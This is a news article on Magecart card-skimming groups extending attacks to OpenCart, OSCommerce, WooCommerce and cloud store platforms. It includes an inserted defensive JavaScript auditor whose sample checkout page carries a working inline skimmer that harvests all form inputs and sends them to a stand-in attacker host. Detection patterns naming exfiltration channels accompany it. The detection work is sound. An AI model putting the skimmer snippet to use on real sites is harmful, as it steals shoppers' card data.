JavaScript card sniffing attacks spread to other e-commerce platforms

OpenCart, OSCommerce, WooCommerce, Shopify are also being targeted.
Written by Catalin Cimpanu, Contributor

Cybercriminal groups engaging in JavaScript card sniffing attacks --also referred to as Magecart attacks-- have slowly expanded their operations beyond the Magento-based stores they initially went after when these attacks began in 2015-2016, and now target additional e-commerce platforms as well.

New research shows that every online shopping platform is now a target, and that each needs to be monitored for compromise of its checkout process, the point at which attackers attempt to log and steal the payment card data customers enter into checkout and payment forms.

For example, a report published today by threat intelligence firm RiskIQ details ongoing Magecart attacks against OpenCart and OSCommerce sites, two lesser-known online store solutions.

"Reading through the OpenCart as well as the OsCommerce forums, we can find multiple instances where administrators were able to figure out they were breached," the company said.


These infections turned out to be coordinated attacks carried out by what RiskIQ is tracking as Magecart Group 12, which specifically targeted the OpenCart platform.

But other platforms have also been targeted. A report published by Group-IB last month also highlighted ongoing attacks against Shopify and (WordPress) WooCommerce-based stores as well.

Sanguine Security's Willem de Groot also described Magecart attacks specifically targeting WooCommerce platforms last August, in an interview with ThreatPost.

From Magento to ...everything else

As is becoming increasingly obvious, JavaScript sniffers, once considered a threat only to Magento, are now a danger to all online store platforms, whether they are self-hosted solutions or cloud-based commercial SaaS platforms.

"Organizations need to understand that skimming groups can prey on any web environment and we see every online shopping platform targeted in our telemetry data," Yonathan Klijnsma, RiskIQ Threat Researcher, said in a report released today.

And it all makes sense. JavaScript card sniffing refers to loading a malicious script on pages that deal with checkout operations, with the malicious script secretly recording a user's payment card details and sending data to a remote server.

The first groups to engage in these attacks exploited vulnerabilities in the Magento e-commerce platform because, at the time, Magento was the most widely used solution, which made it the most attractive attack surface.

But today's e-commerce store scene is a lot more diverse, with many other e-commerce platforms available to interested store owners.


Furthermore, the number of Magecart hacking groups has also increased, pushing competing gangs towards other platforms in search of new victims.

JavaScript card sniffers becoming technology agnostic

While the RiskIQ report released today highlights a series of attacks targeting OpenCart-based stores, Magecart groups don't see themselves as limited to just Magento, WooCommerce, OpenCart, or OSCommerce platforms.

These groups will exploit any vulnerability they can and will break into any website that serves a checkout page. Recent JavaScript card sniffer scripts discovered by RiskIQ, Group-IB, and other firms appear to be designed to be technology agnostic: rather than targeting one platform's form layout, they harvest whatever input fields the page contains, and over the past few months they have been extended to steal card data from an increasingly wide variety of checkout page formats and payment gateways.

Just earlier this week, Sanguine Security discovered one of these multi-functional scripts that had been coded to collect data from 57 different payment systems, showing how the JavaScript card sniffer scene has evolved from a narrow focus on Magento stores to a state where any online store, regardless of its underlying technology or payment gateway, can be attacked.
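The two conditions described above (a script that records checkout form input and ships it to a remote server, and the newer generation of sniffers that harvest every input field rather than one platform's form layout) are what a store operator's monitoring has to look for. The following is an added example, not code from this article or from RiskIQ, Group-IB, or Sanguine Security: a static audit of a checkout page's HTML that flags scripts loaded from origins the operator has not approved (the supply-chain case, where a compromised widget or analytics provider is the entry point) and inline scripts that combine the building blocks of a generic skimmer. The allowlisted origins, the indicator regexes, the threshold, and the sample page HTML are all constructed for the example.

```javascript
// Added example (not from the article or any vendor it cites): audit a checkout page's
// HTML for the things a JavaScript card sniffer needs on the page: a script loaded from
// an unapproved origin, or inline code that hooks the form, harvests input values and
// sends them off-site. Allowlist, origins and page HTML are constructed for the example.

const ALLOWED_SCRIPT_ORIGINS = new Set([
  "https://shop.example",  // assumed first-party store origin
  "https://js.stripe.com", // assumed approved payment-provider script host
]);

// Building blocks of a generic skimmer. An inline script is flagged when it matches at
// least SKIMMER_THRESHOLD of these indicators; no single one is suspicious on its own.
const SKIMMER_INDICATORS = [
  /\b(card_?number|cc_?number|cvv|cvc|expiry|exp_?date)\b/i,       // names payment fields
  /querySelectorAll\(\s*['"][^'"]*\binput\b|\.value\b/,            // harvests input values
  /\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b/,             // exfiltration channel
  /\b(btoa|encodeURIComponent|JSON\.stringify)\(/,                 // encodes the payload
  /addEventListener\(\s*['"](submit|click|keyup|change|blur)['"]/, // hooks a user action
];
const SKIMMER_THRESHOLD = 3;

function originOf(src, pageOrigin) {
  try {
    return new URL(src, pageOrigin).origin; // resolves relative paths against the page
  } catch (e) {
    return null; // an unparsable src is treated as unknown and therefore flagged
  }
}

function auditCheckoutHtml(html, pageOrigin) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (srcMatch) {
      // External script: only the origin matters, and it must be on the allowlist.
      const origin = originOf(srcMatch[1], pageOrigin);
      if (origin === null || !ALLOWED_SCRIPT_ORIGINS.has(origin)) {
        findings.push({ kind: "external-script", src: srcMatch[1], origin });
      }
      continue;
    }
    // Inline script: score it against the skimmer indicators.
    const matched = SKIMMER_INDICATORS.filter((re) => re.test(body));
    if (matched.length >= SKIMMER_THRESHOLD) {
      findings.push({
        kind: "inline-skimmer-pattern",
        score: matched.length,
        snippet: body.trim().replace(/\s+/g, " ").slice(0, 80),
      });
    }
  }
  return findings;
}

// Constructed checkout page: a first-party script, an approved provider script, an
// analytics widget nobody approved, and an inline script shaped like a generic sniffer
// (it reads every input on the page rather than naming any payment field).
const SAMPLE_CHECKOUT_HTML = `
<form id="checkout">
  <input name="card_number"> <input name="cvv"> <input name="expiry">
</form>
<script src="/js/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://cdn.analytics-widget.test/track.js"></script>
<script>
  document.getElementById("checkout").addEventListener("submit", function () {
    var d = {};
    document.querySelectorAll("input").forEach(function (i) { d[i.name] = i.value; });
    new Image().src = "https://collect.attacker.test/?q=" + btoa(JSON.stringify(d));
  });
</script>`;

const SAMPLE_FINDINGS = auditCheckoutHtml(SAMPLE_CHECKOUT_HTML, "https://shop.example");
for (const f of SAMPLE_FINDINGS) {
  console.log(JSON.stringify(f));
}
```

Run against the sample page this reports one unapproved external script (the analytics widget) and one inline script scoring 4 of 5 indicators; a page with only allowlisted scripts and benign inline code produces no findings. The check is a heuristic and deliberately avoids relying on field names, since the sniffers the article describes no longer need them. It also only sees the HTML as served: a skimmer injected at runtime by an already-approved third-party script, which is the supply-chain case, only shows up if the audit is repeated against the rendered DOM or the third-party script itself, so in practice the allowlist should be enforced in the browser as well through a Content-Security-Policy `script-src` directive.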

As RiskIQ mentioned in a report last year, these groups aren't just exploiting Magento vulnerabilities anymore. Some of them, such as threat actors tracked as Magecart group #4, #5, #6, or #12, have evolved from targeting the stores themselves, to targeting their supply-chains (widgets, plugins, or analytics providers used by the stores).

Commercial cloud-based platforms are also at risk

This recent trend of focusing on compromising supply-chain providers also allows these groups to infect a wide variety of platforms, ranging from self-hosted stores to cloud-based platforms such as the ones provided by Magento, Shopify, Wix, Squarespace, X-Cart, OpenCart, and the plethora of other commercially-sold online store solutions.

Last fall, when Magecart was the hot topic on everybody's lips in the infosec community, ZDNet reached out to several providers of cloud-based online store systems and inquired about the security systems they have in place to prevent JavaScript card sniffers from infecting their fleet of online stores and stealing customers' data.

Of the seven platforms we reached out to, only two responded --namely BigCommerce and Shopify.

Of the two, Shopify had probably the best security measure in place, as the platform does not allow "customizations for credit card collection and processing such as the inclusion of third-party JavaScript."

This means that neither merchants nor attackers can tinker with Shopify's payment card entry and processing scripts in any way unless they compromise Shopify itself.

Similarly, BigCommerce also deploys an array of cyber-security protections "including perimeter and server-specific firewalls, web application firewalls, file integrity monitors, intrusion detection systems, sitewide HTTPS, 24/7 human monitoring and routine penetration testing conducted by PCI-certified information security service providers," Scott Baker, vice president of IT, security and technical operations at BigCommerce, told ZDNet last year in a two-page document detailing the company's security practices.

"Though the BigCommerce APIs allow programmatic changes to the scripts included on a BigCommerce store, the checkout page - where these APIs are most commonly in use - includes extra protections that require additional scopes. These scopes can only be listed in our marketplace by PCI-compliant companies, and must be requested by the third-party application at installation. Furthermore, BigCommerce requires that an explicit agreement be signed before the merchant can manually change their checkout scripts," Baker also added.

Companies like Wix, OpenCart Cloud, Magento, and X-Cart did not return a request for comment. Squarespace did not want to comment.

JS skimming profits on par with ATM skimming

With the price of payment card details obtained from online stores now on par with that of data obtained from ATM skimming, attacks on online stores are expected to continue and even grow in intensity.

Prices for CP (Card Present) and CNP (Card Not Present) card data. Card data obtained from online stores fits in the CNP category.

Image: Gemini Advisory, via KrebsOnSecurity

Furthermore, RiskIQ also sees Magecart groups expanding operations from JS card skimming to collecting additional details, such as login credentials, which can be sold online, as a secondary revenue stream.

"Skimming attacks on any platform is a critical issue because while payment data is currently the focus, we're already seeing moves to skim login credentials and other sensitive information," RiskIQ's Klijnsma also added.

"This widens the scope of potential Magecart victims far beyond e-commerce alone," the expert said, because it lets Magecart groups weaponize and monetize sniffing code that inadvertently lands on websites that don't include a shopping experience to begin with.
